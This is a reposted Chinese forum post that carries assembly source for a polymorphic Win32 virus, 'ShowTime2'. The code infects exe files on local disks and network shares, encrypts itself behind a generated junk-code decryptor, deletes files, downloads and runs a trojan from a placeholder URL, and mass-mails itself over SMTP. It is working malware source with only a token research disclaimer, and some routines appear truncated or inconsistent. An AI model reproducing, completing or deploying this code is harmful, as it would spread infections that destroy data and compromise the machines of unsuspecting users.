[转载]Win32.poly.ShowTime2病毒源码
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])[language=asm];***************************************************************
; 名 称:Trash
; 测试平台:Win98/masmV7.0
;
; 申明:本文仅作技术研究,否则后果自负
;注:
;
;编译命令行:
; ml /c /coff poly.asm
; link /subsystem:windows /section:.text,rew poly.obj
;***************************************************************
;;简 介:
;1. 感染本地硬盘和网络上所有exe(GUI)文件
;2. 搜索本地所有邮件地址,将病毒作为附件发送出去
;3. 从网上下载木马程序并运行。
;4. 利用QQ散播消息。
;*************************************************
;工作流程:
;1.首先得到重定位信息,保存在ebx中.
;2.调用GetKBase ,得到Kernel32.dll的基地址。
;3.调用GetAPIz,得到程序将使用的Kernel32中所有API.
;4.判断是被感染文件还是自身.如是被感染文件则分配空间并动态产生解密模块,然后解密程序代码。
; 否则直接到5
;5. 调用DownloadFile下载木马程序
;6. 调用RunExe执行木马程序
;7.调用DownloadFile下载邮件体hello.eml文件
;8. 启动发送QQ消息线程
;9. 感染本地Exe文件
;***************************************************
.386
.Model Flat, StdCall
Option Casemap :None
;___________________________________________________________________________
include d:\masm32\useful.inc
.code
Main:
Flag dd 45678h
szCaption db "ShowTime",0
szText db "Good luck!",0
Msgbox:
invoke MessageBox,NULL,addr szText,addr szCaption,MB_OK
invoke ExitProcess,NULL
VStart:
call Start
Start:
pop ebx ;病毒在宿主中的位置
sub ebx , offset Start
call GetKBase ;获得KERNEL.DLL基地址
jnz VStar
jz VStar
db 0e9h ;花指令
VStar:
call GetAPIz;获得病毒用到的APIs的地址
mov eax,offset Msgbox
.if Flag!=45678h;第一次运行则不用变形
Next1:
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push VirusLen
push NULL
call _VirtualAlloc[ebx]
mov hMem[ebx],eax
lea esi,[offset Load+ebx]
mov edi,hMem[ebx]
mov ecx,EncryptLen/4
push ebx
call Metamorphosize
pop ebx
push ebx
call hMem[ebx]
pop ebx
.endif
call Load
;**********获得image of kernel32.dll的基址*****************
GetKBase:
mov edi , [esp+04h]
and edi , 0FFFF0000h
.while TRUE
.if WORD ptr [edi] == IMAGE_DOS_SIGNATURE ;判断是否是MZ
mov esi, edi
add esi, DWORD ptr [esi+03Ch] ;esi指向PE标志
.if DWORD ptr [esi] ==IMAGE_NT_SIGNATURE;是否有PE标志
.break;如果有跳出循环
.endif
.endif
sub edi, 010000h
.if edi < MIN_KERNEL_SEARCH_BASE ;win9x
mov edi, 0bff70000h ;0bff7000h=9x"base
.break
.endif
.endw
mov hKernel32[ebx],edi;把找到的KERNEL32。DLL的基地址保存起来
ret
GetAPIz:
push edi
mov edx,edi ;edx->KERNEL32基地址
assume edx :ptr IMAGE_DOS_HEADER
add edx,[edx].e_lfanew
assume edx:ptr IMAGE_NT_HEADERS
mov edx,[edx].OptionalHeader.DataDirectory.VirtualAddress
add edx,hKernel32[ebx];EDX->KERNEL32输出表地址
assume edx:ptr IMAGE_EXPORT_DIRECTORY
push edx
mov ebp,[edx].AddressOfNames
add ebp,hKernel32[ebx] ;ebp->指向所有函数名的RVA数组
push ebp
xor eax,eax ;eax为序号
.repeat
push 14 ;为GetProcAddress函数名的长度
pop ecx
mov edi,[ebp]
add edi,hKernel32[ebx]
lea esi,[offset nGetProcAddress+ebx]
repz cmpsb;比较输出表中第I个函数名是否是GetProcessAddress
.if zero?
.break ;如果是跳出
.endif
add ebp,4 ;下一个RVA
inc eax ;序号加1
.until eax == [edx].NumberOfNames ;[edx].NumberOfNames为函数的个数
mov ebp, [edx].AddressOfNameOrdinals ;指向AddressOfNames数组中相关函数的序数的16位数组
add ebp, hKernel32[ebx]
movzx ecx, word ptr [ebp+eax*2] ;取GetProcessAddress函数的序号
mov ebp, [edx].AddressOfFunctions ;[edx].AddressOfFunctions指向所有输出函数的RVA数组的首址
add ebp, hKernel32[ebx]
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax为GetProcAddress函数的地址
mov _GetProcAddress[ebx],eax
pop ebp
pop edx
pop edi
xor eax,eax ;eax为序号
.repeat
push 12 ;LoadLibraryA函数名的长度
pop ecx
mov edi,[ebp]
add edi,hKernel32[ebx]
lea esi,[offset nLoadLibraryA+ebx]
repz cmpsb;比较输出表中第I个函数名是否是LoadLibraryA
.if zero?
.break ;如果是跳出
.endif
add ebp,4 ;下一个RVA
inc eax ;序号加1
.until eax == [edx].NumberOfNames ;[edx].NumberOfNames为函数的个数
mov ebp, [edx].AddressOfNameOrdinals ;指向AddressOfNames数组中相关函数的序数的16位数组
add ebp, hKernel32[ebx]
movzx ecx, word ptr [ebp+eax*2] ;取LoadLibraryA函数的序号
mov ebp, [edx].AddressOfFunctions ;[edx].AddressOfFunctions指向所有输出函数的RVA数组的首址
add ebp, hKernel32[ebx]
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax为LoadLibraryA函数的地址
mov _LoadLibraryA[ebx],eax
lea eax,[offset nKernel+ebx]
push eax
call _LoadLibraryA[ebx]
mov DWORD ptr hKernel32[ebx],eax
GetOApiz:
call @api_table
db "LoadLibraryA",0
db "CreateThread",0
db "CreateRemoteThread",0
db "WinExec",0
db "CreateMutexA",0
db "OpenMutexA",0
db "ReleaseMutex",0
db "FindFirstFileA",0
db "FindNextFileA",0
db "FindClose",0
db "CreateFileA",0
db "CreateFileMappingA",0
db "MapViewOfFile",0
db "UnmapViewOfFile",0
db "SetFilePointer",0
db "ReadFile",0
db "GetComputerNameA",0
db "WriteFile",0
db "CloseHandle",0
db "VirtualAlloc",0
db "VirtualAllocEx",0
db "WriteProcessMemory",0
db "VirtualFree",0
db "VirtualFreeEx",0
db "lstrcmpi",0
db "lstrcpy",0
db "lstrcat",0
db "lstrlen",0
db "GetFileSize",0
db "GetSystemDirectoryA",0
db "GetModuleFileNameA",0
db "Sleep",0
db "GetSystemTime",0
db "DeleteFileA",0
db "OpenProcess",0
db "GetModuleHandleA",0
db "GetCurrentDirectoryA",0
db "SetCurrentDirectoryA",0
db "ExitProcess",0
db "GetExitCodeThread",0
db "ResumeThread",0
@api_table:
pop edi
call @api_dest
K_Apiz:
_LoadLibraryA dd 0
_CreateThread dd 0
_CreateRemoteThread dd 0
_WinExec dd 0
_CreateMutex dd 0
_OpenMutex dd 0
_ReleaseMutex dd 0
_FindFirstFile dd 0
_FindNextFile dd 0
_FindClose dd 0
_CreateFile dd 0
_CreateFileMapping dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_SetFilePointer dd 0
_ReadFile dd 0
_GetComputerNameA dd 0
_WriteFile dd 0
_CloseHandle dd 0
_VirtualAlloc dd 0
_VirtualAllocEx dd 0
_WriteProcessMemory dd 0
_VirtualFree dd 0
_VirtualFreeEx dd 0
_lstrcmpi dd 0
_lstrcpy dd 0
_lstrcat dd 0
_lstrlen dd 0
_GetFileSize dd 0
_GetSystemDirectory dd 0
_GetModuleFileNameA dd 0
_Sleep dd 0
_GetSystemTime dd 0
_DeleteFile dd 0
_OpenProcess dd 0
_GetModuleHandleA dd 0
_GetCurrentDirectoryA dd 0
_SetCurrentDirectoryA dd 0
_ExitProcess dd 0
_GetExitCodeThread dd 0
_ResumeThread dd 0
K_API_NUM = ($-K_Apiz)/4 ;病毒中用到的API函数的个数
@api_dest:
pop esi ;esi为存放找到的函数地址数组的首址
push K_API_NUM
pop ecx
xor ebp,ebp
K_begin:
push ecx
push edi ;edi上面定义的函数名数组的首地址
push hKernel32[ebx]
call _GetProcAddress[ebx]
or eax,eax
jz GA_Fail
;mov edx , DWORD ptr [esi+ebp]
mov dword ptr [esi],eax
GA_Fail:
xor eax,eax
repnz scasb ;寻找字符串结束标志0,使edi指向下个函数名
add esi,4
pop ecx
loop K_begin
call szWsock32
db "Wsock32.dll",0
hSock dd 0
szWsock32:
call _LoadLibraryA[ebx]
mov hSock[ebx],eax
SockApis:
call SockTable
db "WSAStartup",0
db "socket",0
db "htons",0
db "inet_addr",0
db "connect",0
db "send",0
db "closesocket",0
db "WSACleanup",0
db "gethostbyname",0
SockTable:
pop edi
call SockDest
S_Apiz:
_WSAStartup dd 0
_socket dd 0
_htons dd 0
_inet_addr dd 0
_connect dd 0
_send dd 0
_closesocket dd 0
_WSACleanup dd 0
_gethostbyname dd 0
S_ApiNum=($-S_Apiz)/4
SockDest:
pop esi ;esi为存放找到的函数地址数组的首址
push S_ApiNum
pop ecx
xor ebp,ebp
S_begin:
push ecx
push edi ;edi上面定义的函数名数组的首地址
push hSock[ebx]
call _GetProcAddress[ebx]
or eax,eax
jz G_Fail
;mov edx , DWORD ptr [esi+ebp]
mov dword ptr [esi],eax
G_Fail:
xor eax,eax
repnz scasb ;寻找字符串结束标志0,使edi指向下个函数名
add esi,4
pop ecx
loop S_begin
call szUser32
db "User32.dll",0
szFindWindowA db "FindWindowA",0
szFindWindowExA db "FindWindowExA",0
szSendMessageA db "SendMessageA",0
szChildWindowFromPointEx db "ChildWindowFromPointEx",0
_FindWindowA dd 0
_FindWindowExA dd 0
_SendMessageA dd 0
_ChildWindowFromPointEx dd 0
szUser32:
call _LoadLibraryA[ebx]
push esi
mov esi,eax
call szwsprintfA
db "wsprintfA",0
_wsprintf dd 0
szwsprintfA:
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _wsprintf[ebx],eax
lea ecx,[offset szFindWindowA+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _FindWindowA[ebx],eax
lea ecx,[offset szFindWindowExA+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _FindWindowExA[ebx],eax
lea ecx,[offset szSendMessageA+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _SendMessageA[ebx],eax
lea ecx,[offset szChildWindowFromPointEx+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _ChildWindowFromPointEx[ebx],eax
pop esi
ret
;变形引擎原理:
; 变形代码由2部分组成:
; 1)一段经过32位密钥异或加密的代码
; 2)由引擎随机生成的一段对这段加密代码进行解码的模块
;从7个通用寄存器中随机选择3个分别作为索引寄存器,密钥寄存器和计数寄存器。并在
;解密模块的每条有效语句之间随机插入1~3条垃圾代码。
EAX_REG = 0
ECX_REG = 1
EDX_REG = 2
EBX_REG = 3
ESP_REG = 4
EBP_REG = 5
ESI_REG = 6
EDI_REG = 7
INDEX_REG = 0
KEY_REG = 1
COUNT_REG = 2
FREE_REG1 = 3
FREE_REG2 = 4
FREE_REG3 = 5
FREE_REG4 = 6
Random:
push eax
db 0Fh, 031h ;EAX=随机数
xor edx, edx
div dword ptr [esp+8];EAX/种子
pop eax
ret 4
routine1:
mov byte ptr [edi], 0B8h ;B8H为MOV EAX,XXH B9为MOV ECX,XXH...
mov dl, byte ptr [ebx+ecx]
add [edi], dl
inc edi
ret
;产生垃圾代码
GenerateGarbabyCode:
push eax
push 3 ;<决定产生多少条啦级代码
call Random ;
lea ecx, [edx+1] ;
@PL1: mov esi,[esp] ;esi指向SYSTEMTIME结构
call _GetSystemTime[ebx]
;获取当前系统时间
movzx eax , word ptr [esi+6] ;[esi+6]为SYSTEMTIME结构的天数成员
cmp ax,14h ;20号吗?
jnz PL_Exit
KILL: ;如果当前是20号则发作
call ShowTime
PL_Exit:
ret
ShowTime:
ret
;************InfectDisk***********************
;遍历本地硬盘,从C盘到Z盘,调用EnumDir遍历所有exe
;*********************************************
EnumDisk PROC DirName : DWORD,FileType : DWORD
.REPEAT
push FileType
push DirName
call EnumDir
mov eax,DirName
inc byte ptr [eax]
mov al,byte ptr[eax]
.UNTIL al > "z"
mov byte ptr [eax] , "c"
ret 8
EnumDisk ENDP
;************EnumDir************
;遍历DirName,寻找FileType类型文件
;*******************************
EnumDir PROC DirName : DWORD ,FileType:DWORD
LOCAL hSearch : DWORD
LOCAL DirorFile[MAX_PATH] : DWORD
pushad
push DirName
lea esi,DirorFile
push esi
call _lstrcpy[ebx]
@pushsz "\*.*"
push esi ;DirorFile
call _lstrcat[ebx]
lea edi,[offset wfd+ebx]
push edi
push esi
call _FindFirstFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jz ED_Exit
mov hSearch,eax
.REPEAT
.if byte ptr [wfd+44+ebx]==".";wfd.cFilename
jmp short EN_NEXT
.endif
push DirName
push esi
call _lstrcpy[ebx]
@pushsz "\"
push esi
call _lstrcat[ebx]
lea eax,[wfd+44+ebx]
push eax
push esi ;DirorFile
call _lstrcat[ebx]
mov eax , dword ptr [wfd+ebx]
and eax , FILE_ATTRIBUTE_DIRECTORY
.if eax ==FILE_ATTRIBUTE_DIRECTORY
push dword ptr FileType
push esi
call EnumDir
.else ;是文件
push dword ptr FileType
push esi
call AnFile
.endif
EN_NEXT:
push edi
push hSearch
call _FindNextFile[ebx]
.UNTIL eax==0 ;FindNexeFile fail
ED_Close:
push hSearch
call _FindClose[ebx]
ED_Exit:
popad
ret 8
EnumDir ENDP
AnFile PROC FileName:DWORD,FileType:DWORD
pushad
AF_00: lodsb
or al,al
jnz AF_00
.if FileType == FILE_ALL ;all
push FileName
call _DeleteFile[ebx]
.elseif FileType == FILE_EXE ;exe
mov eax,DWORD ptr [esi-5]
.if eax =="exe."
push FileName
call InfectFile
.elseif eax == "mth."
push FileName
call Parse_HTM
.endif
.endif
popad
ret 8
AnFile ENDP
;感染PE文件
InfectFile PROC FileName : DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
LOCAL ByteWrite: DWORD
pushad
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push FileName
call _CreateFile[ebx];打开要感染的文件
cmp eax,INVALID_HANDLE_VALUE
jz IF_Exit
mov hFile,eax
push 0
push 0
push 0
push PAGE_READWRITE
push NULL
push hFile
call _CreateFileMapping[ebx] ;创建内存映射文件
or eax,eax
jz IF_F3
mov hMapping , eax
push 0
push 0
push 0
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
call _MapViewOfFile[ebx] ;映射为可读写
or eax,eax
jz IF_F2
mov pMapping,eax
mov esi,eax
assume esi :ptr IMAGE_DOS_HEADER;ESI指向IMAGE_DOS_HEADER结构
.IF [esi].e_magic!=IMAGE_DOS_SIGNATURE ;是否是MZ
jmp IF_F1
.ENDIF
.IF [esi].e_lfarlc!=040h
jmp IF_F1
.ENDIF
add esi,[esi].e_lfanew ;此时edx指向IMAGE_NT_HEADERS
assume esi:ptr IMAGE_NT_HEADERS
.IF [esi].Signature!=IMAGE_NT_SIGNATURE ;是PE文件吗?
jmp IF_F1
.ENDIF
.IF word ptr [esi].OptionalHeader.Subsystem!=2
jmp IF_F1
.ENDIF
.IF word ptr [esi+1ah]==0888h ; 感染标志
jmp IF_F1
.ENDIF
mov eax,[esi].OptionalHeader.AddressOfEntryPoint;取原程序入口偏移
add eax,[esi].OptionalHeader.ImageBase ;加上基地址
mov HostEntry[ebx],eax ;保存原入口
;***************************************************************
;判断是否有足够空间存储新节
;28h=sizeof IMAGE_SECTION_HEADER
;18h=sizeof IMAGE_FILE_HEADER+Signature
;edi将指向新节
;***************************************************************
movzx eax,[esi].FileHeader.NumberOfSections ;取文件中的块数
mov ecx,28h
mul ecx
lea edi,[esi]
sub edi,pMapping
add eax,edi
add eax,18h
movzx edi,[esi].FileHeader.SizeOfOptionalHeader
add eax,edi
mov edi,eax
add edi,pMapping ;I forgot this first
add eax,28h
.IF eax>[esi].OptionalHeader.SizeOfHeaders
jmp IF_F1
.ENDIF
;*****************************************
;空间允许, ^0^,开始插入新节并填充各字段
;esi指向原文件最后一个节,利用它来填充新节某些字段
;*****************************************
inc [esi].FileHeader.NumberOfSections
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],69657769h ;"haiwei"
mov WORD ptr [edi+4],6168h;
push [esi].OptionalHeader.SizeOfImage
pop eax
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
push eax ;块对齐
pop [edi].VirtualAddress
mov eax,VirusLen
mov [edi].Misc.VirtualSize,eax
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax
lea eax,[edi-28h+14h] ;PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;SizeOfRawData
mov ecx,[ecx]
add eax,ecx
mov [edi].PointerToRawData,eax
mov [edi].Characteristics,0E0000020h ;可读可写可执行
;***************************************************************
;更新SizeOfImage,AddressOfEntryPoint,使新节可以正确加载并首先执行
;***************************************************************
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov eax,[edi].VirtualAddress
mov [esi].OptionalHeader.AddressOfEntryPoint,eax
mov word ptr [esi+1ah],0888h ;写入感染标志
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push VirusLen
push NULL
call _VirtualAlloc[ebx]
or eax,eax
jz IF_F1
mov pMem[ebx],eax
push edi
push esi
mov edi,eax
lea esi,[offset VStart+ebx]
mov ecx,VirusLen
cld
rep movsb
lea eax,[offset Load+ebx]
push ecx
lea ecx,[offset VStart+ebx]
sub eax,ecx
add eax,pMem[ebx]
pop ecx
mov ecx,EncryptLen/4
En:
xor DWORD ptr [eax],12345678h
add eax,4
loop En
pop esi
pop edi
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
call _SetFilePointer[ebx]
;****************************************************************
;设置文件指针到结尾后,写入从VStart开始的代码,大小经过文件对齐
;****************************************************************
push 0
lea eax,ByteWrite
push eax
push VirusLen
mov eax,pMem[ebx]
push eax
push hFile
call _WriteFile[ebx]
IF_F1:
push pMapping
call _UnmapViewOfFile[ebx]
IF_F2:
push hMapping
call _CloseHandle[ebx]
IF_F3:
push hFile
call _CloseHandle[ebx]
IF_Exit:
popad
ret 4
InfectFile ENDP
;*******************************
;下载文件代码
;*******************************
DownloadFile proc dwFile:DWORD
pushad
call szWininet
db "Wininet.dll",0
szWininet:
call _LoadLibraryA[ebx]
or eax,eax
jz DF_ret
mov esi,eax
push MAX_PATH
call szFileName
dwFileName db MAX_PATH dup(0)
szFileName:
pop edi
push edi
call _GetSystemDirectory[ebx]
or eax,eax
jz DF_ret
@pushsz "\"
push edi
call _lstrcat[ebx]
push dwFile
push edi
call _lstrcat[ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
push edi
call _CreateFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jnz Fexsting
call szInternetOpen
db "InternetOpenA",0
szInternetOpen:
push esi
call _GetProcAddress[ebx]
push 0
push NULL
push NULL
push INTERNET_OPEN_TYPE_PRECONFIG
call AgentName
db "szlogin",0
AgentName:
call eax
or eax,eax
jz DF_ret
mov hSession[ebx],eax
call szInternetOpenUrl
db "InternetOpenUrlA",0
_InternetOpenUrlA dd 0
szInternetOpenUrl:
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _InternetOpenUrlA[ebx],eax
call Url
db "[url]http://xxx.net/[/url]",0
szUrl db MAX_PATH dup (0)
Url:
lea edi,[offset szUrl+ebx]
push edi
call _lstrcpy[ebx]
push dwFile
push edi
call _lstrcat[ebx]
push 0
push INTERNET_FLAG_NO_AUTO_REDIRECT
push 0
push NULL
push edi
push hSession[ebx]
call _InternetOpenUrlA[ebx]
or eax,eax
jz DF_ret
mov DWORD ptr hHttpFile[ebx],eax
mov DWORD ptr dwRead[ebx],MAX_PATH
call szHttpQueryInfo
db "HttpQueryInfoA",0
szHttpQueryInfo:
push esi
call _GetProcAddress[ebx]
mov edi,eax
push NULL
lea ecx,[offset dwRead+ebx]
push ecx
lea ecx,[offset szBuffer+ebx]
push ecx
push HTTP_QUERY_STATUS_CODE
push hHttpFile[ebx]
call edi
push NULL
lea ecx,[offset dwRead+ebx]
push ecx
lea ecx,[offset szBuffer+ebx]
push ecx
push HTTP_QUERY_CONTENT_LENGTH
push hHttpFile[ebx]
call edi
push NULL
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
lea ecx,[offset dwFileName+ebx]
push ecx
call _CreateFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jz DF_ret
mov hSaveFile[ebx],eax
call szInternetReadFile
db "InternetReadFile",0
szInternetReadFile:
push esi
call _GetProcAddress[ebx]
mov edi,eax
.repeat
lea ecx,[offset dwRead+ebx]
push ecx
push sizeof szBuffer
lea ecx,[offset szBuffer+ebx]
push ecx
push hHttpFile[ebx]
call edi
.if eax
.break .if dwRead[ebx]== 0
push NULL
lea ecx,[offset dwWrite+ebx]
push ecx
push dwRead[ebx]
lea ecx,[offset szBuffer+ebx]
push ecx
push hSaveFile[ebx]
call _WriteFile[ebx]
.endif
.until 0
Fexsting:
push MAX_PATH
lea edi,[offset dwFileName+ebx]
push edi
call _GetSystemDirectory[ebx]
or eax,eax
jz DF_ret
@pushsz "\"
push edi
call _lstrcat[ebx]
push dwFile
push edi
call _lstrcat[ebx]
DF_ret:
push hSaveFile[ebx]
call _CloseHandle[ebx]
call szInternetCloseHandle
db "InternetCloseHandle",0
szInternetCloseHandle:
push esi
call _GetProcAddress[ebx]
mov edi,eax
push hHttpFile[ebx]
call edi
push hSession[ebx]
call edi
popad
lea eax,[offset dwFileName+ebx]
ret
DownloadFile endp
;**************************************
;发送邮件过程
;**************************************
SendMail proc eMail:DWORD
pushad
lea ecx,[offset wsa+ebx]
push ecx
push 101h
call _WSAStartup[ebx]
or eax,eax
jnz SM_ret
push 0
push SOCK_STREAM
push AF_INET
call _socket[ebx]
cmp eax,-1h
jz SM_ret
mov esi,eax
lea edi,[offset sock+ebx]
assume edi:ptr sockaddr_in
mov [edi].sin_family,AF_INET
push 25
call _htons[ebx]
mov [edi].sin_port,ax
call PushSmtpSrvr
db "smtp.163.com",0
PushSmtpSrvr:
call _gethostbyname[ebx]
assume eax:ptr hostent
mov eax,DWORD ptr [eax].h_list
mov eax,DWORD ptr [eax]
mov eax,DWORD ptr [eax]
mov DWORD ptr[edi].sin_addr,eax
push sizeof sockaddr_in
push edi
push esi
call _connect[ebx]
cmp eax,-1h
jz SM_ret
push 0
push 13
call Ehlo
db "EHLO o1i5a4",0dh,0ah
buffer db 2000h dup(0)
szCap db "test",0
Ehlo:
push esi
call _send[ebx]
push 0
push 12
call Auth
db "AUTH LOGIN",0dh,0ah
Auth:
push esi
call _send[ebx]
push 0
push 18
call szUserName
db "dfadsfaadf",0dh,0ah,0
szUserName:
push esi
call _send[ebx] ;发送用户名.......
push 0
push 14
call Pass
password db "xxxxxxxxx",0dh,0ah,0 ;这里是经过BASE64编码的密码
Pass:
push esi
call _send[ebx]
;invoke recv,esi,addr buffer,2000h,0
;invoke MessageBox,NULL,addr buffer,addr szCap,MB_OK
push 0
push 32
call Mailfrom
db "MAIL FROM: [email]xxxx@163.com[/email]",0dh,0ah
Mailfrom:
push esi
call _send[ebx]
jmp Next
szRcpt db "RCPT TO: <%s>",0dh,0ah,0
Rcpt db 80 dup(0)
Next:
push eMail
lea ecx,[offset szRcpt+ebx]
push ecx
lea ecx,[offset Rcpt+ebx]
push ecx
call _wsprintf[ebx]
add esp,0ch
lea ecx,[offset Rcpt+ebx]
push ecx
call _lstrlen[ebx]
push 0
push eax
lea ecx,[offset Rcpt+ebx]
push ecx
push esi
call _send[ebx]
push 0
push 6
call vData
db "DATA",0dh,0ah
vData:
push esi
call _send[ebx]
push MAX_PATH
call szSysDir
SysDir db MAX_PATH dup(0)
szSysDir:
call _GetSystemDirectory[ebx]
call szfile
db "\hello.eml",0
szfile :
lea ecx,[offset SysDir+ebx]
push ecx
call _lstrcat[ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
lea ecx,[offset SysDir+ebx]
push ecx
call _CreateFile[ebx]
mov hFile1[ebx],eax
cmp eax,INVALID_HANDLE_VALUE
jz SM_ret
push NULL
push hFile1[ebx]
call _GetFileSize[ebx]
push esi ;保存套接字
mov esi,eax
push PAGE_READWRITE
push MEM_COMMIT
push esi
push NULL
call _VirtualAlloc[ebx]
mov edi,eax
push 0
lea ecx,[offset dwRead+ebx]
push ecx ;最终读出的字节数
push esi ;需要读出的字节数
push edi ;数据缓冲区
push hFile1[ebx]
call _ReadFile[ebx]
pop esi ;恢复套接字
mov ecx,DWORD ptr dwRead[ebx]
re2:
sub ecx,1000
jb ex
push ecx
push 0
push 1000
push edi
push esi ;套接字
call _send[ebx]
add edi,1000
pop ecx
jmp re2
ex:
add ecx,1000
push 0
push ecx
push edi
push esi
call _send[ebx]
push 0
push 5
call szEndData
db 0dh,0ah, ".",0dh,0ah,0
szEndData:
push esi
call _send[ebx]
push 4000
call _Sleep[ebx]
push 0
push 6
call szQuit
db "QUIT",0dh,0ah,0
szQuit:
push esi
call _send[ebx]
push 4000
call _Sleep[ebx]
SM_ret:
push hFile1[ebx]
call _CloseHandle[ebx]
push esi
call _closesocket[ebx]
call _WSACleanup[ebx]
popad
ret
SendMail endp
myCallBack dd 0
EnumNetBoot proc ;列举网络Boot
;//开始列举网络资源
pushad
mov ebp,NULL ;//列举网络, 从根开始
mov eax,RESOURCEUSAGE_CONTAINER
lea ecx,[offset EnumNetWorkGroup+ebx]
mov DWORD ptr myCallBack[ebx],ecx
call EnumNetObject
popad
ret
EnumNetBoot endp
EnumNetWorkGroup proc ;//列举工作组
;ebp=父资源缓冲区
push ecx
mov eax,RESOURCEUSAGE_CONTAINER
lea ecx,[offset EnumNetComputer+ebx]
mov DWORD ptr myCallBack[ebx],ecx
call EnumNetObject
pop ecx
ret
EnumNetWorkGroup endp
EnumNetComputer proc ;//列举网络计算机
;ebp=父资源缓冲区
push ecx
mov eax,RESOURCEUSAGE_CONTAINER
lea ecx,[offset EnumNetComputerShareDir+ebx]
mov DWORD ptr myCallBack[ebx],ecx
call EnumNetObject
pop ecx
ret
EnumNetComputer endp
EnumNetComputerShareDir proc ;//列举网络计算机共享目录
;ebp=父资源缓冲区
push ecx
mov eax,RESOURCEUSAGE_CONNECTABLE
lea ecx,[offset DisplayMsg+ebx]
mov DWORD ptr myCallBack[ebx],ecx
call EnumNetObject
pop ecx
ret
EnumNetComputerShareDir endp
DisplayMsg proc ;//显示列举出来的共享目录
push ebp
assume ebp:ptr NETRESOURCE
mov eax,[ebp].lpRemoteName
mov edi,[ebp].lpProvider
mov ebp,[ebp].lpRemoteName
call EnumFileObject
pop ebp
ret
DisplayMsg endp
;//用来列举局域网某种对象
EnumNetObject proc
;//eax=资源标志 ,ebx=找到对象后自动回调函数指针, ebp=父资源缓冲区
pushad
push eax
push esp
push ebp
push eax
push RESOURCETYPE_DISK
push RESOURCE_GLOBALNET
call _WNetOpenEnumA[ebx]
pop esi ;//弹出hEnum句柄,平衡堆栈
or eax,eax
jnz short EnumNetObjectError
sub esp,100h
mov ebp,esp ;//在堆栈中开辟缓冲区
LoopEnumNetObject:
mov eax,1
push eax
;//一次列举一个
mov eax,esp
push 100h ;//缓冲区大小(edi=100h)
push esp
push ebp
push eax
push esi
call _WNetEnumResourceA[ebx]
pop edi
pop edi ;//平衡堆栈
or eax,eax
jnz short EnumNetObjectOver
call myCallBack[ebx] ;//调用回调函数
jmp short LoopEnumNetObject
EnumNetObjectOver:
push esi
call _WNetCloseEnum[ebx]
add esp,100h
EnumNetObjectError:
popad
ret
EnumNetObject endp
;//用来列举本地目录/网络上某个共享目录
EnumFileObject proc
;ebp=父目录的缓冲区
pushad
push ebp
call _SetCurrentDirectoryA[ebx]
or eax,eax
jz SetDirError
mov edi,100h
sub esp,edi ;//开辟200h字节的缓冲区
mov DWORD ptr [esp],2a2e2ah ;//建立"*.*"字符串
mov eax,esp
push esp
push eax
call _FindFirstFile[ebx]
mov esi,eax
inc eax
jz short EnumFileObjectError
LoopEnumFileObject:
push esp
push esi
call _FindNextFile[ebx]
;invoke FindNextFileA,esi,esp
or eax,eax
jz short EnumFileObjectOver
mov edi,esp
assume edi:ptr WIN32_FIND_DATA
lea ebp,[edi].cFileName
mov eax,[edi].dwFileAttributes
and eax,10h ;//测试文件属性
jz short IsFileObject
IsDirObject: ;//是一个目录
mov eax,DWORD ptr [ebp]
cmp al,"." ;//测试是否点目录,是就不处理
jz short LoopEnumFileObject
call EnumFileObject ;//递归调用
jmp short LoopEnumFileObject
IsFileObject: ;//是一个文件
call FoundFileObject ;//整备该操作文件
jmp short LoopEnumFileObject
EnumFileObjectOver:
push esi
call _CloseHandle[ebx]
EnumFileObjectError:
mov DWORD ptr [esp],2e2eh ;// 恢复原来的当前目录 建立字符串".."
push esp
call _SetCurrentDirectoryA[ebx]
add esp,100h ;//平衡堆栈
SetDirError:
popad
ret
EnumFileObject endp
FoundFileObject proc
;//ebp=不带路径的文件名
pushad
mov edi,ebp
xor eax,eax
LoopFindExtName:
inc edi
cmp [edi],al
jnz LoopFindExtName
mov eax,DWORD ptr[edi-4]
or eax,20202020h
cmp eax,"exe."
jnz NotExeFile
call szCurrentDirectory
CurrentDirectory db MAX_PATH dup (0)
szCurrentDirectory:
push MAX_PATH
call _GetCurrentDirectoryA[ebx]
call szA
db "\",0
szA:
lea ecx,[offset CurrentDirectory+ebx]
push ecx
call _lstrcat[ebx]
push ebp
push ecx
call _lstrcat[ebx]
push ecx
call InfectFile
NotExeFile:
popad
ret
FoundFileObject endp
;************************************
;取得MPR.DLL里相关函数地址
;************************************
